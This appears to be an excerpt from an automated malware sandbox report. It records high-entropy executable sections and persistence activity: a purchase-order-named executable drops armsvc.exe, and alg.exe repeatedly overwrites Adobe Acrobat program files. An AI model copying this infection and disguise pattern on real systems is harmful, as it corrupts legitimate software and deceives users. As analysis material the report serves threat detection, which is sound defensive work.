                        Source: pwahelper.exe0.3.drStatic PE information: section name: .reloc entropy: 7.940905655743149
                        Source: AcroCEF.exe.3.drStatic PE information: section name: .reloc entropy: 7.937567567492111
                        Source: SingleClientServicesUpdater.exe.3.drStatic PE information: section name: .reloc entropy: 7.943702405275626
                        Source: AcroCEF.exe0.3.drStatic PE information: section name: .reloc entropy: 7.937572202101801
                        Source: MicrosoftEdgeUpdateSetup.exe.3.drStatic PE information: section name: .reloc entropy: 7.939190867020072

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\90fdfad63d8f4c72.binJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
